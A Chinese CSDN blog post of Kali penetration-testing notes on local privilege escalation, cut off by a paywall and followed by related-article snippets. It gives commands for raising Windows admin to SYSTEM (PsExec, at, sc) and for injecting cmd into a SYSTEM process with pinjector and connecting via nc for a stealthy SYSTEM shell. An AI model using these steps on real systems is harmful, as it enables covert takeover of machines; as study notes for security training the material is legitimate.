kali提权笔记

最新推荐文章于 2024-04-21 11:33:11 发布
最新推荐文章于 2024-04-21 11:33:11 发布
阅读量491 收藏 2
点赞数
分类专栏: kali渗透测试学习笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fhl5203/article/details/102859794
版权

本地提权
系统账号之间的权限隔离
操作系统安全的基础
用户空间、内核空间
系统账号
用户账号登陆时获取权限令牌
服务账号无需用户登陆已在后台启动服务

windows的账户有user(平时创建的账户类型)、Administrator 管理员、system系统账户
linux的账户有user(同上)、root(等同于Windows的admin+system)

windows
admin提权为system:
sysinternal suite:使用sysinternal suite中的PsExec工具,cmd在工具exe所在目录psexec -i -s -d cmd即可调出system权限的cmd
at命令:at 19:39 /interactive cmd (XP可用 以上系统不可用)
sc命令:sc create syscmd binPath= ”cmd /k start” type= own type= interact
sc start syscmd(此方法win7使用有安全提示 需要在图形界面操作 也等于不可用)

注入进程提权:
使用pinjector.exe,将cmd注入到现有的进程里,注入的进程是什么账户的,就会获得什么账户
pinjector.exe -p 656 cmd 5555 将cmd注入到PID是656的进程里(此时656是SYSTEM账户的services.exe服务),并开放侦听5555端口,随后在kali直接nc -nv [IP] 5555 就可以获得到windows的shell并且是SYSTEM账户权限
注入进程很隐蔽,不会多出一个进程,

最低0.47元/天 解锁文章
fhl5203
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kali-linux笔记
01-10
个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践...
Kali普通账户如何获取root管理员权限并切换中文?
bangshao1989的博客
06-12 1万+
有很多人刚下载Kali发现是英文的,并且不知道怎么改系统语言,现在就帮大家解答下,希望多多支持哦!因为Kali系统默认使用普通账号kali,所以我们要把它提权以便进行其他操作,下面为大家详细介绍一下:1)打开终端窗口,输入sudo su。2)根据提示输入普通账号kali的密码。(一般为kali)1)输入命令sudo -i1)输入命令vim /etc/passwd后,进入到下图中的界面2)找到下图中以kali开头的那一行,按i进入插入模式,然后将数字1000:1000更改为0:03)按Esc键退出插入模式4)
Kali将用户权限永久提升为root
ianTok
10-02 4738
Kali
如何在Kali Linux中获得root权限?
2301_77498991的博客
05-05 1万+
在本教程中,我们学习了如何在Kali Linux中向普通用户授予root权限。你可以使用本指南中的说明,在任何命令前加上sudo,再也不用输入密码了。当Kali的开发者在最新的版本中限制root登录时,他们一定预料到一些用户会被激怒;因此,他们提供了许多恢复能力的选项。在使用根密码的时候,有一句话要注意:把它安全地控制起来;否则,系统就可能被破坏。我希望这篇文章对你在Kali Linux上工作时有指导意义。你可以使用这两种方法中的任何一种来获得系统中的root权限。
内网横移之PsExec
Canterlot的博客
09-04 1239
本文介绍了PsExec的运行原理,执行命令的工作过程,以及相关工具基本用法
kali的基础linux命令
SHI_GUANG123的博客
10-17 1740
命令执行结果中,每个部分是一个网卡,此处我这里有两个网卡:eth0 和 lo 在kali中,网卡的命名格式:ethX,第一个网卡的名字是eth0,第二个网卡eth1,第三个网卡 eth2....安装kalil的过程中,并未设置root的密码,而是创建了一个普通用户,并且未普通用户设置了一个密 码。注意:如果打开后,发现是空白的,则说明文件路径错误,或者文件名错误。vi后面的文件如果是存在的,那么这个文件就被打开了。vi后面的文件如果是不存在的,那么就会创建这个文件。在写文件路径的时候,最好从根目录开始写。
安全课堂kali linux笔记1~100课.zip
07-27
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的...
KALI linux学习记录笔记
05-13
KALI linux学习记录笔记 linux入门的笔记,包括常用命令!
kali学习笔记1.pdf
07-19
windows下的扫描软件NEXPOSE),windows和linux缓冲区溢出原理以及实践(包括编写shellcode的方法),提权方法(详细讲解windows身份认证过程,本地提权,注入进程提取,利用漏洞提权,利用配置不当提权,wce攻击,著名...
kali Linux渗透技术详解笔记
07-27
kali Linux环境部署,Linux相关命令,枚举工具,简单网络管理协议,邮件传输协议。
Kali渗透基础》10. 提权、后渗透
学习学习学习......
07-23 799
提权、Admin 提权为 System、抓包嗅探、键盘记录、本地缓存密码(PwDump,WCE,fgdump,Mimikatz)、利用漏洞提权、利用配置不当提权(icacls,find)、信息与数据收集、痕迹隐藏。
kali下设置root权限(包含很多技巧)
最新发布
weixin_49765221的博客
04-21 322
新安装的kali下如何设置root?
Kali Linux环境下的提权漏洞挖掘与利用详解
Kali与编程
04-14 560
综上所述,在Kali Linux环境下,通过有效的信息收集、漏洞扫描和巧妙利用内置工具及第三方漏洞利用框架,能够有效地挖掘和利用目标系统的提权漏洞。攻击者可以利用类似“bash -p”这样的命令行选项,创建一个新的shell并继承SUID权限,从而实现提权。在Kali中,通过提供目标系统的发行版和内核版本信息,它可以快速推荐可能存在的提权漏洞及其利用方式。PEASS集合了一系列用于Linux提权的脚本和工具,涵盖了许多常见且实用的提权技术,包括但不限于SUID/SGID程序漏洞、配置错误、内核漏洞等。
kali永久提root权限
lrz1876的博客
01-17 7320
进入终端后输入 输入sudo su 输入kali密码(一般都是kali) 输入sudo -i 输入vim /etc/passwd(注意vim后有个空格) 5.找到倒数第二行的两个1000都改成0(光标指定后输入i就可以编辑) 改好之后按住shift然后按Z两下就可以保存,然后按esc退出,输入命令reboot重启kali就可以了 学习内容来自链接:link. 如有冒犯,请及时告知,一定及时删除! ...
Kali Linux 秘籍 第七章 权限提升
热门推荐
龙哥盟
10-05 4万+
第七章 权限提升 作者:Willie L. Pritchett, David De Smet 译者:飞龙 协议:CC BY-NC-SA 4.0 简介我们已经获得了想要攻击的计算机的权限。于是将权限尽可能提升就非常重要。通常,我们能访问较低权限的用户账户(计算机用户),但是,我们的目标账户可能是管理员账户。这一章中我们会探索几种提升权限的方式。7.1 使用模拟令牌这个秘籍中,我
kali提升root权限
cuisidong1997的博客
11-27 1537
4、按 i 进入编辑模式,将想要提升权限的用户名后面的1000:1000改为0:0;5、按esc退出后,按 wq 或 shift+zz保存退出;6、reboot重启。
kali Linux 渗透系统的安装、提权与汉化(初识 Linux 系统)
Welcome To Myon'Blog !
02-26 2377
当然实 root 用户的权限其实远超 Windows 管理员的权限,拥有对系统的完全控制权。我这里推荐的是下载 vmx 文件,下载后解压,在 vmware 中打开即可直接开机使用。目前我们只是普通用户,该命令为超级用户才能执行的命令,因此命令前需要加上 sudo。如果你下载的是 iso 光盘镜像文件,则需要自己进行简单配置,都好弄,看个人喜好。那么需要修改 一个文件,在 /etc/passwd 的,关于这个方法我就不再演示。在这个情况下,我们就拥有了最高权限,可以执行任意命令,而不需要加 sudo。
kali系统简单入门
m0_59636224的博客
10-23 1273
kali基础操作命令作用及格式
kali如何调用笔记本网卡
05-12
通常情况下,Kali Linux会自动识别笔记本电脑上的网卡并加载相应的驱动程序。如果你的笔记本网卡无法正常工作,可以尝试以下几种方法: 1. 检查是否已经安装了适当的驱动程序。可以通过运行命令“lspci”或“lsusb...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值